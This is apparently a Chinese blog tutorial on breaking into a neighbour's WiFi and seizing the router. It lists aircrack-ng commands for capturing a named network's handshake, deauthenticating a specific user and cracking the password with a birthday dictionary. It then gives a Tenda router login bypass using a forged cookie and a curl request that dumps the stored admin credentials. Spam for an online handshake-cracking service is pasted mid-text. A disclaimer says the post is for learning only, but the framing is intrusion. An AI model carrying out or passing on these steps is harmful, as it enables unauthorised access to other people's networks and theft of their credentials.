实战!入侵隔壁家WiFi与获取路由器管理权!

大家好,今天我们来讨论网络安全的话题,这篇文章将介绍一些入门级的内容,如果您是高手可以直接跳过。请注意,本文仅供学习之用,请勿尝试违法行为,否则后果自负。

  1. 获取WiFi密码
    首先,我们需要准备一张无线网卡(本文使用RT3070型号)、Aircrack-ng工具和密码字典。您可以在以下链接下载Aircrack-ng工具:

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

密码字典可以在以下链接下载:

(1). 使用命令”sudo airmon-ng”查看您的无线网卡接口名称,例如我的接口名称是wlx983f9f182782。
(2). 使用命令”sudo airmon-ng start wlx983f9f182782″开始监控您的无线网卡。执行完此命令后,系统会为您提供一个监控接口(例如wlan0mon)。
(3). 使用命令”sudo airodump-ng wlan0mon”来捕获附近的WiFi信号。在本例中,我们将入侵的目标是名为Tenda_243F00的路由器,其BSSID是C8:3A:35:24:3F:00,信道为10号。
(4). 使用命令”sudo airodump-ng –bssid C8:3A:35:24:3F:00 -c 10 -w tenda wlan0mon”来获取该路由器的握手包(其中包含加密的WiFi密码)。获取的数据将保存到名为tenda的文件中(-w tenda,您可以自行更改文件名)。在进行下一步之前,请不要关闭此窗口。
(5). 使用命令”sudo aireplay-ng -0 0 -a C8:3A:35:24:3F:00 -c 60:21:01:3B:03:71 wlan0mon”来伪装成路由器向该路由器的用户发送请求(其中60:21:01:3B:03:71是用户的MAC地址),以获取握手包(-0后面的参数指定请求次数,0表示无限次)。一旦(4)窗口右上角出现”handshake: C8:3A:35:24:3F:00″(表示您已成功获取加密密码),您可以关闭所有窗口。
至此,您已经获得了包含加密密码的文件。
(6). 使用命令”sudo aircrack-ng -w bir.txt tenda-01.cap”开始解密过程。请根据自己的需要选择合适的密码字典。在本例中,我选择了名为bir.txt的字典,其中bir代表生日,因为很多人喜欢将自己的生日作为WiFi密码。仅仅几秒钟的时间,密码就会显示在屏幕上。由于真实入侵的原因,我将屏蔽密码的显示。
现在,您可以使用这个密码成功连接WiFi了!

  1. 获取控制权
    现在进入第二步,获取控制权。能否成功取决于您是否能发现该路由器的漏洞。在本例中,我们使用的是腾达路由器,并且我在网上偶然看到了关于它的漏洞文章,使得入侵变得轻而易举。

(1). 大多数路由器的管理界面位于网段的最前面,例如192.168.0.1、192.168.1.1等。这里我就不再赘述了,您可以使用”ifconfig”命令查看路由器的网段。在本例中,我的路由器网段是192.168.0.1。
(2). 这个路由器有一个非常有趣的漏洞,只要您加入cookie: admin:language=cn,就能直接绕过后台登录,获取管理员权限。我们立即使用curl发送一个请求到管理员页面进行尝试,命令为”curl -H cookie:admin:language=cn”。果然,我们成功绕过登录界面并获得了最高权限。好了,现在进入重头戏,既然我们获得了权限,我们就能够获取路由器备份的管理员密码。该路由器的备份文件位于/cgi-bin/DownloadCfg/RouterCfm.cfg,我们尝试使用命令”curl -H cookie:admin:language=cn | grep http”,最终,账号和密码都展现在我们眼前。

再次强调,请不要进行任何违法行为!

赞(0)